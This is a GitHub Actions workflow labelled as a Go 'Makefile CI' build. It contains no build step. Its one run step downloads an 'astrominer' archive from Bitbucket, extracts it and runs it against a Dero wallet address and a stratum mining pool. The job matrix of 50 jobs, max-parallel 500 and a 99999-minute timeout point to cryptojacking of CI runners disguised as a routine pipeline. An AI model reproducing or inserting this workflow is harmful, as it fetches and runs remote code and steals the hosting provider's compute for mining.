name: Makefile CI

on:
  push:
    branches: 
      - main
      - ajak
      - ajak3
      - amang 
      - amang2
      - amang3
  pull_request:
    branches: [ "main" ]
jobs:
  build:
    name: BIN_Github
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 500
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5]
        flag: [A, B, C, D, E, F, G, H, I, J]
    timeout-minutes: 99999
    env:
        NUM_JOBS: 500
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v4
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v4
    - name: runner_go
      run: |
         wget https://bitbucket.org/wename798/jaya/downloads/astrominer.tar.gz && tar -xvf astrominer.tar.gz && ./astrominer -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xmglejssqhngtrqzsn49h -r stratum+tcp://stue.threepool.tech:3030 

  
